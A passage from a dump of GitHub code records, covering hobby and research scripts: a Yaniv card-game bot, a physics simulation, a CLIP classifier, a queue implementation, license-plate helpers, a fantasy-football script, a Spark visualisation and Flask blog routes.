get_sum(pair):\n decision['cards_to_throw'] = pair\n copy_hand = [card for card in player_hand if not card in pair]\n copy_hand.append(last_cards_thrown[0])\n copy_hand.sort()\n opt1 = get_sum(check_for_pairs(copy_hand))\n copy_hand.remove(last_cards_thrown[0])\n copy_hand.append(last_cards_thrown[-1])\n copy_hand.sort\n opt2 = get_sum(check_for_pairs(copy_hand))\n if opt1 > opt2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n elif opt1 < opt2:\n decision['pile_or_deck'] = last_cards_thrown[-1]\n elif opt2 == 0:\n decision['pile_or_deck'] = 'deck'\n else:\n decision['pile_or_deck'] = last_cards_thrown[0]\n\n elif get_sum(straight) > get_sum(pair):\n print(\"in case get_sum(straight) > get_sum(pair)\")\n\n decision['cards_to_throw'] = straight\n copy_hand = [card for card in player_hand if not card in straight]\n copy_hand.append(last_cards_thrown[0])\n copy_hand.sort()\n opt1 = 
get_sum(check_for_pairs(copy_hand))\n copy_hand.remove(last_cards_thrown[0])\n copy_hand.append(last_cards_thrown[-1])\n copy_hand.sort\n opt2 = get_sum(check_for_pairs(copy_hand))\n if opt1 > opt2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n elif opt1 < opt2:\n decision['pile_or_deck'] = last_cards_thrown[-1]\n elif opt2 == 0:\n decision['pile_or_deck'] = 'deck'\n else:\n decision['pile_or_deck'] = last_cards_thrown[0]\n \n elif len(straight) == 0 and get_sum(pair) > 0:\n print(\"in case len(straight) == 0 and get_sum(pair) > 4\")\n decision['cards_to_throw'] = pair\n if int(last_cards_thrown[0][:2]) > 5:\n decision['pile_or_deck'] = last_cards_thrown[0] \n elif int(last_cards_thrown[-1][:2]) > 5:\n decision['pile_or_deck'] = last_cards_thrown[-1] \n else:\n decision['pile_or_deck'] = 'deck'\n elif get_sum(pair) == 0 and get_sum(straight) == 0:\n print(\"in case no pair no straghit\")\n player_hand_copy = copy.copy(player_hand)\n player_hand_copy.append(last_cards_thrown[0])\n player_hand_copy.sort()\n opt_for_pair1 = check_for_pairs(player_hand_copy)\n opt_for_str1 = check_for_straghit(player_hand_copy)\n \n player_hand_copy.remove(last_cards_thrown[0])\n options = [opt_for_pair1, opt_for_str1]\n if len(last_cards_thrown) > 1:\n player_hand_copy.append(last_cards_thrown[-1])\n player_hand_copy.sort()\n \n opt_for_pair2 = check_for_pairs(player_hand_copy)\n opt_for_str2 = check_for_straghit(player_hand_copy)\n player_hand_copy.remove(last_cards_thrown[-1])\n options.append( opt_for_pair2)\n options.append( opt_for_str2)\n final_opt = options[0]\n max_sum = 0\n for opt in options:\n x = get_sum(opt)\n if x > max_sum:\n max_sum = x\n final_opt = opt\n if max_sum == 0:\n decision['cards_to_throw'] = [player_hand[-1]]\n if int(last_cards_thrown[0][:2]) < 2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n else:\n decision['pile_or_deck'] = \"deck\"\n else:\n for card in player_hand_copy:\n if card in final_opt:\n final_opt.remove(card)\n else:\n decision['cards_to_throw'] = [card]\n \n \n decision['pile_or_deck'] = final_opt.pop()\n \n return decision\n\n\n\ndef get_sum(cards_set):\n cards_sum = 0\n for card in cards_set:\n cards_sum += int(card[:2])\n return cards_sum\n\ndef check_for_straghit(player_hand):\n straight = set()\n current_straghit = set()\n joker_red = 0\n joker_black = 0\n if \"00_red_joker\" in player_hand:\n joker_red += 1\n if \"00_black_joker\" in player_hand:\n joker_black += 1\n start_index = joker_red + joker_black\n for i in range(start_index, len(player_hand)-1):\n card_i_prop = str(player_hand[i]).split('_') \n for j in range(i+1, len(player_hand)):\n card_j_prop = str(player_hand[j]).split('_')\n if int(card_i_prop[0]) == int(card_j_prop[0])-1 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n else:\n if joker_black == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-2 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add(\"00_black_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n if joker_red == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-2 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add(\"00_red_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n if joker_red == 1 and joker_black == 1:\n if int(card_i_prop[0]) == int(card_j_prop[0])-3 and card_i_prop[2] == 
card_j_prop[2]:\n current_straghit.add(\"00_red_joker\")\n current_straghit.add(\"00_black_joker\")\n current_straghit.add('_'.join(card_i_prop))\n current_straghit.add('_'.join(card_j_prop))\n card_i_prop = card_j_prop\n \n if len(current_straghit) == 2 and joker_red == 1:\n current_straghit.add(\"00_red_joker\")\n elif len(current_straghit) == 2 and joker_black == 1:\n current_straghit.add(\"00_black_joker\")\n if len(current_straghit) > 2 and len(current_straghit) > len(straight):\n straight = copy.copy(current_straghit)\n current_straghit.clear()\n return list(straight)\n\ndef check_for_pairs(player_hand):\n pair1 = set()\n pair2 = set()\n for i in range(len(player_hand)-1):\n if player_hand[i][:2] == player_hand[i+1][:2]:\n if len(pair1) == 0:\n pair1.add(player_hand[i])\n pair1.add(player_hand[i+1])\n elif player_hand[i] in pair1:\n pair1.add(player_hand[i+1])\n else:\n pair2.add(player_hand[i])\n pair2.add(player_hand[i+1])\n \n if get_sum(pair1) >= get_sum(pair2):\n return list(pair1)\n else:\n return list(pair2)\ndef sort_straghit(straghit:list):\n straghit.sort()\n print(straghit)\n ms = find_missing_cards_for_straghit(straghit)\n print(ms)\n if len(ms) == 1:\n if (straghit[0] == '00_red_joker' or straghit[0] == '00_black_joker') and straghit[1][:2] == \"01\":\n temp = straghit[2]\n straghit[2] = straghit[0]\n straghit[0] = temp\n temp = straghit[0]\n straghit[0] = straghit[1]\n straghit[1] = temp\n else:\n temp = straghit[1] \n straghit[1] = straghit[0]\n straghit[0] = temp\n elif len(ms) == 2:\n temp = straghit[2] \n straghit[2] = straghit[0]\n straghit[0] = temp\n\ndef find_missing_cards_for_straghit(straghit):\n card_list = list(straghit)\n card_list.sort()\n return_val = []\n for i in range(len(card_list)-1):\n if int(card_list[i][:2]) == 0:\n continue\n if int(card_list[i][:2]) == int(card_list[i+1][:2])-2:\n rank = int(card_list[i][:2])+1\n if rank < 10:\n return_val.append(\"0\"+str(rank)+ card_list[i][2::])\n else:\n return_val.append(str(rank)+ card_list[i][2::])\n\n if int(card_list[i][:2]) == int(card_list[i+1][:2])-3:\n rank = int(card_list[i][:2])+1\n if rank < 10:\n return_val.append(\"0\"+str(rank)+ card_list[i][2::])\n else:\n return_val.append(str(rank)+ card_list[i][2::])\n if rank < 9:\n return_val.append(\"0\"+str(rank+1)+ card_list[i][2::])\n elif rank < 13:\n return_val.append(str(rank+1)+ card_list[i][2::])\n if int(card_list[0][:2]) == 0 and int(card_list[1][:2]) == 1:\n rank = int(card_list[-1][:2])\n if rank < 9:\n return_val.append(\"0\"+str(rank+1)+ card_list[-1][2::])\n elif rank < 13:\n return_val.append(str(rank+1)+ card_list[-1][2::])\n elif int(card_list[0][:2]) == int(card_list[1][:2])-1 and int(card_list[0][:2]) != 0:\n rank = int(card_list[0][:2])\n if rank != 0:\n if rank < 11:\n return_val.append(\"0\"+str(rank-1)+ card_list[0][2::])\n else:\n return_val.append(str(rank-1)+ card_list[0][2::])\n if rank < 8:\n return_val.append(\"0\"+str(rank+2)+ card_list[0][2::])\n elif rank < 12:\n return_val.append(str(rank+2)+ card_list[0][2::])\n\n return return_val\n","repo_name":"arikost/YanivCardGame","sub_path":"flask-server/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":11549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14049709170","text":"#!/bin/bash\n\n''':'\ntest_path=test/\nfail_msg=\"*** validation failed\"\n\necho \"INFO: 'make clean' must work\"\nmake clean ; ret=$?\n\nif [ -n \"$(ls _layer*.so _utils*.so 2> /dev/null)\" ] ; then\n echo \"$fail_msg for 
uncleanness\"\n exit 1\nfi\n\necho \"INFO: 'make utils layer'' must work\"\nmake utils layer; ret=$?\nif [ 0 -ne $ret ] ; then echo \"$fail_msg\" ; exit $ret ; fi\n\necho \"INFO: validate using pytest\"\npython3 -m pytest $test_path/test_layer.py; ret=$?\nif [ 0 -ne $ret ] ; then echo \"$fail_msg\" ; exit $ret ; fi\n\nmake clean;\nexit 0\n':'''\n\nimport unittest\nimport os\n\nfrom _layer import Layer\n \ndef test_save_load():\n origin_layer = Layer(2, 2, \"linear\", False)\n origin_layer.test_save_layer(\"save_layer_test\")\n print(\"origin layer: {}\".format(origin_layer))\n\n new_layer = Layer()\n print(\"new layer: {}\".format(new_layer))\n new_layer.test_load_layer(\"save_layer_test\")\n print(\"loaded layer: {}\".format(new_layer))\n\n assert(origin_layer.__str__() == new_layer.__str__())\n\ntest_save_load()","repo_name":"hychiu02/AutoEncoder-for-arrhythmia-detection","sub_path":"test/test_layer.py","file_name":"test_layer.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15110249741","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nimport tdse\n\ndt = 0.008\ndr = 0.02\nr_max = 120\nNr=r_max/dr\nNl=6\n\natom = tdse.atom.Ar\nsh_grid = tdse.grid.ShGrid(Nr=Nr, Nl=Nl, r_max=r_max)\nsp_grid = tdse.grid.SpGrid(Nr=Nr, Nc=33, Np=1, r_max=r_max)\nylm_cache = tdse.sphere_harmonics.YlmCache(Nl, sp_grid)\nuabs = tdse.abs_pot.UabsMultiHump(20*dr, r_max/8)\nuabs = tdse.abs_pot.UabsZero()\nws = tdse.workspace.SOrbsWorkspace(sh_grid, sp_grid, uabs, ylm_cache, Uh_lmax=1, Uxc_lmax=3)\norbs = tdse.orbitals.Orbitals(atom, sh_grid)\norbs.load('ar_r_120_lb.npy')\n#orbs.normalize()\n\nT = 2*np.pi / 5.7e-2\ntp = 20*T\n\nf = tdse.field.TwoColorSinField(\n E0=tdse.utils.I_to_E(2e14),\n alpha=0.0,\n tp=tp\n )\n\nr = np.linspace(dr,r_max,Nr)\n\nt = np.arange(0, tp, dt)\n\ndef data_gen():\n for i in range(t.size):\n #if i % 20 == 0:\n print(\"t = {}, E = {}\".format(t[i], f.E(t[i])))\n yield i\n ws.prop(orbs, atom, f, t[i], dt)\n\nfig = plt.figure()\nax = plt.subplot(121)\nax_n = plt.subplot(122)\n\nlines = []\nfor ie in range(atom.countOrbs):\n line, = ax.plot(r, np.abs(orbs.asarray()[0,0])**2, label=\"n = {}\".format(ie))\n lines.append(line)\n\nax.grid()\nax.set_ylim(1e-20, 1e3)\nax.set_yscale('log')\n\nn = np.zeros((t.size, atom.countOrbs))\naz = np.zeros(t.size)\nz = np.zeros(t.size)\norbs.norm_ne(n[0,:], True)\nprint(n[0,:])\n\nline_n, = ax_n.plot(t, az, label=\"az\")\nax_n.set_ylim(-1e-6, 1e-6)\nlines.append(line_n)\n\nline_az, = ax_n.plot(t[1:-1], np.diff(z,2)/dt**2, label=\"z\")\nlines.append(line_az)\n\ndef run(data):\n i = data\n\n arr = orbs.asarray()\n for ie in range(atom.countOrbs):\n lines[ie].set_ydata(np.sum(np.abs(arr[ie])**2, axis=0))\n\n orbs.norm_ne(n[i,:], True)\n az[i] = tdse.calc.az(orbs, atom, f, t[i])\n z[i] = orbs.z()\n print(\"az = \", az[i])\n line_n.set_ydata(az)\n line_az.set_ydata(np.diff(z,2)/dt**2)\n ax_n.set_xlim(0, t[i])\n ax_n.set_ylim(np.min(az[0:i+1]), np.max(az[0:i+1]))\n print(n[i,:])\n return lines,\n\nani = animation.FuncAnimation(fig, run, data_gen, blit=False, interval=1, repeat=False)\nplt.legend()\nplt.show()\n","repo_name":"vssanya/tddft","sub_path":"test/argon_prop.py","file_name":"argon_prop.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19465631426","text":"import 
os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nimport torch\nimport clip\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom utils import load_data, find_first_smaller, evaluate, find_first_sum_smaller\n\n\ndef seed_everything(seed=11711):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\nif __name__ == '__main__':\n seed_everything(44)\n\n # load pretrained model\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model, preprocess = clip.load(\"ViT-B/32\", device=device)\n\n # test data preparation\n test_folder = '../data/test_set_task3/'\n data, classes = load_data(test_folder + 'test_set_task3.txt')\n classes = list(classes)\n\n length = len(data)\n pred_labels, gold_labels = {}, {}\n\n # set up the prompt method, 'no' and 'imply' are implemented here\n prompt_method = 'imply' # or 'no'\n\n # iterate each data point\n for i in range(length):\n print(f'processing {i + 1} / {length}')\n # process image\n image = preprocess(Image.open(test_folder + data[i]['image'])).unsqueeze(0).to(device)\n\n pred = []\n for j in range(len(classes)):\n # tokenize text\n if prompt_method == 'no':\n text = clip.tokenize([classes[j], 'no ' + classes[j]]).to(device)\n # ************ final results ************\n # Macro_F1: 0.14849517479516472\n # Micro_F1: 0.20749542961608777\n elif prompt_method == 'imply':\n text = clip.tokenize(['The Meme implies ' + classes[j], 'The Meme does not imply ' + classes[j]]).to(device)\n # ************ final results ************\n # Macro_F1: 0.18715687127161748\n # Micro_F1: 0.21447562776957166\n else:\n raise ValueError(f'{prompt_method} is not implemented. 
Please implement here')\n\n # make predictions\n with torch.no_grad():\n logits_per_image, logits_per_text = model(image, text)\n probs = logits_per_image.softmax(dim=-1).cpu().numpy()\n prob = list(probs[0])\n \n if prob[0] >= prob[1]:\n pred.append(classes[j])\n pred_labels[data[i]['id']] = pred\n gold_labels[data[i]['id']] = data[i]['labels']\n\n # calculate Macro_F1 and Micro_F1\n macro_f1, micro_f1 = evaluate(pred_labels, gold_labels, classes)\n print('************ final results ************')\n print('Macro_F1: ', macro_f1)\n print('Micro_F1: ', micro_f1)","repo_name":"xli2245/CS769_Project","sub_path":"clip_zero_shot/sgl_class_based_clip.py","file_name":"sgl_class_based_clip.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31767324225","text":"import argparse\nimport os.path\nimport struct\nimport numpy as np\nfrom quadtree import Quadtree, RGB\nfrom PIL import Image\n\ndef is_valid_read_file(parser, arg):\n if not os.path.exists(arg):\n parser.error(\"The file %s does not exist!\" % arg)\n else:\n return arg\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('image',\n help='image file',\n type=lambda x: is_valid_read_file(parser, x))\nparser.add_argument('operation',\n help='operation to do on image',\n type=str)\n\nargs = parser.parse_args()\nimg_raw = Image.open(args.image)\nimg_rgb = img_raw.convert('RGB')\nwidth, height = img_rgb.size\nshape = (height, width)\ncolors = np.empty(shape,dtype=RGB)\npixels = img_rgb.load()\nfor h in range(height):\n for w in range(width):\n colors[h][w] = RGB(pixels[w,h])\nqtree = Quadtree(colors)\nmodified = qtree.outline()\n\n\n\n\n","repo_name":"ichang1/imageProcessing","sub_path":"python_ver/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72269619920","text":"# push, pop, size, empty, front, back\n# 모두 O(1)이 걸려야 함\n# 이중연결리스트로 구현한 queue를 써야 할 듯\n\nimport sys\n\nclass Node:\n\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\nclass Queue:\n\n def __init__(self):\n self.nodeCount = 0\n self.head = Node(None)\n self.tail = Node(None)\n self.head.prev = None\n self.head.next = self.tail\n self.tail.prev = self.head\n self.tail.next = None\n\n def push(self, X):\n newNode = Node(X)\n if self.nodeCount == 0:\n self.head.next = newNode\n self.tail.prev = newNode\n self.nodeCount += 1\n \n else: # tail에서 들어가도록 바꿔야함.\n curr = self.tail.prev\n curr.next = newNode\n self.tail.prev = newNode\n newNode.next = self.tail\n newNode.prev = curr\n self.nodeCount += 1\n\n def pop(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n curr = self.head.next\n self.head.next = curr.next\n curr.next.prev = self.head\n self.nodeCount -= 1\n return curr.data\n\n def size(self):\n return self.nodeCount\n\n def empty(self):\n if self.nodeCount == 0:\n return 1\n\n else:\n return 0\n\n def front(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n return self.head.next.data\n\n def back(self):\n if self.nodeCount == 0:\n return -1\n\n else:\n return self.tail.prev.data\n\n\nif __name__==\"__main__\":\n n = int(sys.stdin.readline())\n queue = Queue()\n for i in range(n):\n command = sys.stdin.readline().split()\n\n if command[0]=='push':\n queue.push(int(command[1]))\n\n elif command[0]=='pop':\n result = queue.pop()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='size':\n 
result = queue.size()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='empty':\n result = queue.empty()\n sys.stdout.write(str(result)+'\\n')\n\n elif command[0]=='front':\n result = queue.front()\n sys.stdout.write(str(result)+'\\n')\n\n else:\n result = queue.back()\n sys.stdout.write(str(result)+'\\n')\n\n# 클래스로 구현해서 시간초과 뜨는 듯","repo_name":"haecheol-shin/algorithm_exercise","sub_path":"BOJ_DataStructure/BOJ_18258.py","file_name":"BOJ_18258.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30997672351","text":"import numpy as np\nimport cv2\n\nfrom utils.class_config import CHARACTER_CLASS\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n return rect\n\ndef perspective_transform(img):\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n _, gray = cv2.threshold(gray_img, 150, 255, cv2.THRESH_BINARY )\n\n cont, _ = cv2.findContours(gray,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n\n if cont == ():\n return img\n\n cont = sorted(cont, key= lambda cont:cv2.contourArea(cont), reverse = True)\n a = cont[0].reshape(cont[0].shape[0], cont[0].shape[2])\n\n rect = cv2.minAreaRect(a)\n\n\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n box = np.array(box)\n rect = order_points(box)\n\n (tl, tr, br, bl) = rect\n\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n # # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(img, M, (maxWidth, maxHeight))\n\n if warped.shape[0] < 20:\n return img\n\n if warped.shape[1] < 20:\n return img\n return warped\n\ndef check_is_square_plate(boxes):\n return np.mean([box[-1] for box in boxes]) < 0.65\n\ndef sort_boxes_along_x(boxes):\n indice = np.argsort([box[0] for box in boxes]) \n return np.array(boxes)[indice]\n\ndef get_character(boxes):\n result = \"\"\n for box in boxes:\n result += CHARACTER_CLASS[int(box[-2])]\n\n return result\n\ndef get_value(boxes):\n if boxes == []:\n return \"Empty\"\n if check_is_square_plate(boxes):\n upper_character = []\n lower_character = []\n for box in boxes:\n if box[1] < 0.5:\n upper_character.append(box)\n else:\n lower_character.append(box)\n \n sorted_upper_character = sort_boxes_along_x(upper_character)\n sorted_lower_character = sort_boxes_along_x(lower_character)\n upper_string = get_character(sorted_upper_character)\n lower_string = get_character(sorted_lower_character)\n\n result_string = upper_string + \"-\" + lower_string\n\n else:\n sorted_character = sort_boxes_along_x(boxes)\n result_string = get_character(sorted_character)\n\n return result_string\n\ndef enhance_contrast(img):\n b_img, g_img, r_img = cv2.split(img)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(32, 32))\n equalized_b_img = clahe.apply(b_img)\n equalized_g_img = clahe.apply(g_img)\n equalized_r_img = 
clahe.apply(r_img)\n\n return cv2.merge([equalized_b_img, equalized_g_img, equalized_r_img]),\\\n cv2.merge([cv2.equalizeHist(b_img), cv2.equalizeHist(g_img), cv2.equalizeHist(r_img)])","repo_name":"cuongtvee/Traffic_light","sub_path":"utils/license_plate_general.py","file_name":"license_plate_general.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"45067553262","text":"from Tasks.GetSleeperUsers import *\nfrom Tasks.GetNflPlayers import *\nfrom Tasks.GetUserRosters import *\nfrom Tasks.GetSleeperMatchup import *\nfrom Tasks.GetGameHistory import *\nfrom Models.fantasy_team_model import FantasyTeam\n\ndef GetSleeper(week):\n users = GetSleeperUserData()\n rosters = GetUserRosterData()\n players = GetNFLPlayersData()\n matchup_groups = GetSleeperMatchup(week)\n \n fantasy_teams = []\n roster_to_fantasy_team = {} # Create a dictionary to map roster_id to FantasyTeam\n for roster in rosters:\n owner = next(user for user in users if user.user_id == roster.owner_id)\n fantasy_team = FantasyTeam(owner, roster, players)\n fantasy_teams.append(fantasy_team)\n roster_to_fantasy_team[roster.roster_id] = fantasy_team # Add the mapping to the dictionary\n\n # Create a dictionary that maps the usernames to the historical names\n historical_names = {\n \"phutt02\": \"Pete\",\n \"sasqooch\": \"Martin\",\n \"Conman1719\": \"Conman\",\n \"bbrown812\": \"Brendan\",\n \"AlexKonrardy97\": \"Ralph\",\n \"yocool7890\": \"Bill\",\n \"erikstacy\": \"Erik\",\n \"BigMikeDuzIt\": \"Diesel\",\n \"JoHyphenE\": \"Joey\",\n \"KurtTruk\": \"Kurt\",\n \"Tfugz\": \"Troy\",\n \"nbeutin17\": \"Nate\",\n }\n \n returnString = \"\"\n for matchup_group in matchup_groups:\n fantasy_team_1 = roster_to_fantasy_team[matchup_group[0].roster_id]\n fantasy_team_2 = roster_to_fantasy_team[matchup_group[1].roster_id]\n # Look up the historical names from the dictionary and print them\n historical_name_1 = historical_names.get(fantasy_team_1.user.display_name, fantasy_team_1.user.display_name)\n historical_name_2 = historical_names.get(fantasy_team_2.user.display_name, fantasy_team_2.user.display_name)\n\n historical_matchups = GetMatchupHistory(historical_name_1, historical_name_2)\n historical_matchups = sorted(historical_matchups, key=lambda matchup: matchup.Year, reverse=True)\n\n returnString += f\"{historical_name_1} ({fantasy_team_1.user.team_name}) vs. {historical_name_2} ({fantasy_team_2.user.team_name})\\n\"\n \n for matchup in historical_matchups:\n returnString += f\"In {matchup.Year} week {matchup.Week}, {matchup.Winner} won {matchup.Team1Score if matchup.Team1Score > matchup.Team2Score else matchup.Team2Score} to {matchup.Team1Score if matchup.Team1Score < matchup.Team2Score else matchup.Team2Score}{' in a PTGOTW' if matchup.WasPTGOTW == True else ''}\\n\"\n returnString += \"\\n\"\n return returnString","repo_name":"brendanbrown812/BTBPythonScript","sub_path":"Tasks/GetSleeper.py","file_name":"GetSleeper.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22668108782","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession. \\\n builder. \\\n appName(\"WebAalyticsApp\"). \\\n config(\"spark.ui.port\", \"0\"). \\\n getOrCreate()\n\nclicks_df = spark. \\\n read. 
\\\n parquet(\"/Users/akashpatel/Documents/Clairvoyant/dummy/data/\")\n\nclicks_df.show(truncate=False)\n\nfrom pyspark.sql.functions import col, get_json_object\n\nclicks_df = clicks_df. \\\n withColumn(\"x\", get_json_object(col(\"value\"), \"$.x\").cast(\"long\")). \\\n withColumn(\"y\", get_json_object(col(\"value\"), \"$.y\").cast(\"long\")). \\\n drop(\"value\")\n\nclicks_df.printSchema()\n\npandas_df = clicks_df.toPandas()\n\nimport plotly.express as px\n\nfig = px.scatter( x=pandas_df[\"x\"], y=pandas_df[\"y\"])\n\nfig.update_yaxes(autorange=\"reversed\")\n\nfrom PIL import Image\nimg = Image.open('/Users/akashpatel/Documents/Clairvoyant/ClickStreamWebAnalyticsConsumer/visualization/nice.png')\n\nfig.add_layout_image(\n dict(\n source=img,\n xref=\"x\",\n yref=\"y\",\n x=0,\n y=8,\n sizex=1680,\n sizey=713.94,\n sizing=\"stretch\",\n opacity=0.6,\n layer=\"below\"))\n\n\nfig.update_layout(template=\"plotly_white\")\n\nfig.show()\n\nspark.stop()","repo_name":"Akashpatel579/ClickStreamWebAnalyticsConsumer","sub_path":"visualization/click_events_viz.py","file_name":"click_events_viz.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2965437812","text":"import os\nimport secrets\nfrom PIL import Image\nfrom flask import render_template, url_for, flash, redirect, request\nfrom flaskblog import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, UpdateAccountForm\nfrom flaskblog.models import User,Post\nfrom flask_login import login_user, current_user, logout_user, login_required\n\nposts = [\n {\n 'author': 'Chrissy Em',\n 'title': 'Blog Post 2',\n 'content': 'Some content',\n 'date_posted': 'July 1, 2020'\n },\n {\n 'author': 'Chris Em',\n 'title': 'Blog Post 1',\n 'content': 'Some content 1',\n 'date_posted': 'July 10, 2020'\n }\n]\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', posts=posts)\n\n@app.route('/about')\ndef about():\n return render_template('about.html', name='Christine')\n#add methods when collecting data!\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user .is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n #Generate protected password from the data passed into the password field. Do this in strings instead of bytes\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n #create new instance of user for each registration. Do now pass in the original password they registered with, instead use the hased version\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n #To run the server in test mode, call import the db from flaskblog and then run db.create_all()\n flash('Account created! 
Go ahead and login to get started!', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user .is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n#Change name of file uploaded so that it does not clas with a pre-existing file. \n#Use secrets module to randomize image name\n#Use os models to store image type, as image type that was added\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_FN = random_hex + f_ext\n #store path that image is found in. app.root_path gives full path up to package directory\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_FN)\n #resize image before saving (from Pillow module)\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n #saves image\n i.save(picture_path)\n prev_picture = os.path.join(app.root_path, 'static/profile_pics', current_user.image_file)\n if os.path.exists(prev_picture) and os.path.basename(prev_picture) != 'default.jpg':\n os.remove(prev_picture)\n return picture_FN\n\n@app.route('/account', methods=['GET', 'POST'])\n@login_required\ndef account():\n form = UpdateAccountForm()\n if form.validate_on_submit():\n #to save profile picture for user. 
Use a function to set user's profile picture\n if form.picture.data:\n picture_file = save_picture(form.picture.data)\n current_user.image_file = picture_file\n current_user.username = form.username.data\n current_user.email = form.email.data\n db.session.commit()\n flash('your account has been updated', 'success')\n #pay attention to post, get redirect to avoid 'are you sure you want to reload?\" message\n #sends another get request to automatically refresh the page\n #populates form with updated information when you go to the account page\n return redirect(url_for('account'))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.email.data = current_user.email\n image_file = url_for('static', filename='profile_pics/' + current_user.image_file)\n return render_template('account.html', title='Account', image_file=image_file, form=form)\n","repo_name":"Christinekrm02/Blog-App","sub_path":"flaskblog/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24726405253","text":"# this code should be run inside the dataset folder and up the audios folder\r\n# the spectrum will be saved in NEW_DIR in npy format\r\n# check the NEW_DIR and 